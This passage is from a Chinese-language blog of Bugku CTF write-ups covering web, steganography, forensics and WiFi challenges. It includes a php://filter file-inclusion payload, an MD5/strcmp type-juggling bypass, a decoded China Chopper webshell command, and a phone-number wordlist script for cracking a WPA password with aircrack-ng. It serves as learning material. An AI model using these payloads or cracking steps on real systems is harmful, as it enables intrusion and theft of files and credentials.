)

运行出flag:

CTF{whatfk}

flag在index里

题目地址

打开题目后有个链接,尝试点击了下,url变为

http://120.24.86.145:8005/post/index.php?file=show.php

结合题目的提示,flag在index里。猜测是文件包含,然后尝试file=index.php和file=index,并没有结果,而且丧心病狂的返回了。上万条bugku的宣传。。

然后尝试phpfilter协议读取index.php的内容

http://120.24.86.145:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php

成功读取数据

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==
Base64解码得:

<html>
<title>Bugku-ctf</title>

<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

flag为:

flag{edulcni_elif_lacol_si_siht}

前女友

题目地址

右键查看源代码,发现code.txt,点击获取源代码。

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

payload:

http://47.93.190.246:49162/?v1=QNKCDZO&v2=s878926199a&v3[1]=1

flag为:

SKCTF{Php_1s_tH3_B3St_L4NgUag3}

Misc

隐写2

题目地址

这题分数虽然少,但是get到了新姿势。

把文件下载下来,一通工具分析。。并没有找到什么有价值的东西。看了看writeup,才知道要通过Winhex修改图片文件显示的长和宽才可以,该图片实际在下面有flag,但是由于显示的宽度不够,导致下面的那一部分不能够显示。


图示中左侧表示图像的宽,右侧表示图像的高,解题思路,就是将01修改的大一些,使得图像可显示的高度变大,由此显示出flag

这应该算是老套路了,但是我第一次见,记一下。

telnet

题目地址

水题。。数据包用wireshark打开,题目提示telnet,随便右键选一个telnet类型的数据,右键追踪流,获得flag。

这是一张单纯的图片?

题目地址

使用神器StegSolve打开文件,然后File Format打开,发现有特殊的字符串

&#107;&#101;&#121;&#123;&#121;&#111;&#117;&#32; &#97;&#114;&#101;&#32;&#114;&#105;&#103;&#104;&#116;&#125;。

是unicode编码,网上找工具解开即可。

key{you are right}

听首音乐

下载地址:

链接: http://pan.baidu.com/s/1gfvezBl 密码: y6gh

将音乐打开,听了一会,在左声道中听到了滴滴答答的声音。确定为摩尔斯电码,使用Audacity分析

图片1

放大后根据频谱将摩尔斯电码提取出来

..... -... -.-. ----. ..--- ..... -.... ....- ----. -.-. -... ----- .---- ---.. ---.. ..-. ..... ..--- . -.... .---- --... -.. --... ----- ----. ..--- ----. .---- ----. .---- -.-.

解码得

5BC925649CB0188F52E617D70929191C

直接提交即可

妹子的陌陌

http://120.24.86.145:8002/misc/momo.jpg

使用binwalk可以提取出来一个rar压缩包,经过测试是真正有密码。不是伪加密。。

找了很多地方,也用工具爆破了。。没成功,忽然想起以前表哥们发的一加密压缩包的密码是汉字,尝试了下图片上的汉字。。竟然解开了。。

解压获得

电报内容:
..../-/-/.--./---.../-..-./-..-././-./-.-./---/-.././.-.-.-/-.-./..../.-/..../..-/---/.-.-.-/-.-./---/--/-..-.

首长:我操你在逗我吗?你确定是他们纳粹发的吗?
士兵:难道我弄错了?哦。。。等等是这一条

内容:http://c.bugku.com/U2FsdGVkX18tl8Yi7FaGiv6jK1SBxKD30eYb52onYe0=
 AES Key:@#@#¥%……¥¥%%……&¥

士兵:二维码真的扫不出来吗??肯定可以扫出来

解码莫斯电码获得

HTTP//ENCODE.CHAHUO.COM/

访问后是一个解密网站,内容对应的那一个链接,直接访问是404,看样子
需要解密。使用key解密得

momoj2j.png

于是乎,访问

http://c.bugku.com/momoj2j.png

将获得的二维码反色一下即可获得flag

flag为

KEY{nitmzhen6}

Linux基础1

无脑题。。右键Notepad++打开,搜索字符串key,获得flag

flag为

KEY{24f3627a86fc740a7f36ee2c7a1c124a}

图穷匕现

下载图片后,右键查看属性-详细信息,获得提示

根据提示,猜测在文件尾有线索,使用Winhex打开,发现类似16进制的相当长的字符串。

将其复制出来,使用hackbar的16进制转字符串功能,将其转换并保存。转换出一堆坐标点。提示中有说画图,写脚本将其按照像素点的形式画出来

脚本如下

#!Python3
#-*-coding:utf-8-*-
from PIL import Image

file = open('data.txt','r')

IM = Image.new("RGB",(272,272))
for line in file:
    x = line.strip().lstrip('(').rstrip(')')
    tmp = x.split(',')
    IM.putpixel((int(tmp[0]),int(tmp[1])),(255, 255, 255))

file.close()
IM.show()
IM.save('re.png')

画出一个二维码,扫描获得flag

flag为

flag{40fc0a979f759c8892f4dc045e28b820}

Convert

打开txt文档,全是01..网上尝试二进制转字符串,发现开头为rar,看样子是压缩文件,使用python写脚本,将其按照8个一位的格式,写到文件里

脚本如下

#!python3
#-*-coding:utf-8-*-
import binascii
file1 = open('convert.txt','r')
s = file1.read()
file2 = open('re.rar','wb')
s1 = ''

for i in range(0,len(s),8):
    if ((int(s[i:i+8],2))<= 15):
        print(hex(int(s[i:i+8],2)))
        s1 = s1 + '0' + hex(int(s[i:i+8],2)).replace('0x','')
        print (s1)
    else:
        s1 += hex(int(s[i:i+8],2)).replace('0x','')

file2.write(binascii.a2b_hex(s1))

将写出来的rar文件打开,给了个图,叫做key.jpg。

然后使用Winhex打开,找到一串base64

ZmxhZ3swMWEyNWVhM2ZkNjM0OWM2ZTYzNWExZDAxOTZlNzVmYn0=  

解码获得flag

flag{01a25ea3fd6349c6e635a1d0196e75fb}

宽带信息泄露

题目地址

题目提示为

flag格式:
flag{宽带用户名}

下载下来一个.bin的文件,使用NotePad++打开是乱码,看样子需要专用的工具,上网找到一款工具

路由器密码查看器(RouterPassView)
使用工具打开,搜索Password,点几下就能找到

最终flag为

flag{053700357621}

linux???

题目地址
直接解压文件,从里面找到一个flag文件,
右键NotePad++打开,搜索key,点几下查找下一个就能找到flag

flag为

key{feb81d3834e2423c9903f4755464060b}

中国菜刀,不在web里?

题目地址

打开题目,给了一个数据包,既然是中国菜刀,那么过滤出所有http协议的数据来。有三条http的数据流

分别追踪每一个流,找到一点线索,

在第三条数据流中,解码传输的shell命令

123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEY9IkM6XFx3d3dyb290XFxmbGFnLnRhci5neiI7JGZwPUBmb3BlbigkRiwncicpO2lmKEBmZ2V0YygkZnApKXtAZmNsb3NlKCRmcCk7QHJlYWRmaWxlKCRGKTt9ZWxzZXtlY2hvKCdFUlJPUjovLyBDYW4gTm90IFJlYWQnKTt9O2VjaG8oIlhAWSIpO2RpZSgpOw%3D%3D'));\");"));

base64解码得

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\wwwroot\\flag.tar.gz";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();÷￿ýÃ

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
if (PHP_VERSION < '5.3.0') {
    @set_magic_quotes_runtime(0);
};
echo ("X@Y");
$F = "C:\\wwwroot\\flag.tar.gz";
$fp = @fopen($F, 'r');
if (@fgetc($fp)) {
    @fclose($fp);
    @readfile($F);
} else {
    echo ('ERROR:// Can Not Read');
};
echo ("X@Y");
die();
?>

看样子对flag.tar.gz进行了下载。所以服务器返回的数据中有flag,在Line-based text data右键,选择显示分组字节流,调整开始起点来除去开头的X@Y,然后将解码为改为压缩,可获取flag,如图所示

flag为

key{8769fe393f2b998fa6a11afe2bfcd65e}

再来一道隐写

题目地址

这题还是老套路,做题的时候binwalk和Stegsolve分析了下,没找到啥有价值的,忽然想到之前做题的时候,遇到的一个姿势——通过修改图片显示的长和宽来隐藏信息。

使用Winhex打开图片,修改对应的值即可获得flag

flag为

flag{He1l0_d4_ba1}

想蹭网先解开密码

题目地址

题目描述

flag格式:flag{你破解的WiFi密码}

tips:密码为手机号,为了不为难你,大佬特地让我悄悄地把前七位告诉你
1391040**
Goodluck!!

提示密码是手机号,先写个脚本跑个字典出来

#-*-coding:utf-8-*-

s = "1391040"
t = ""
file = open('data.txt','w')

for i in range(10):
    for j in range(10):
        for k in range(10):
            for l in range(10):
                t = s + str(i) + str(j) + str(k) + str(l)
                file.write(t)
                file.write('\n')
file.close()

使用工具Aircrack-ng


flag为

flag{13910407686}

Crypto


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!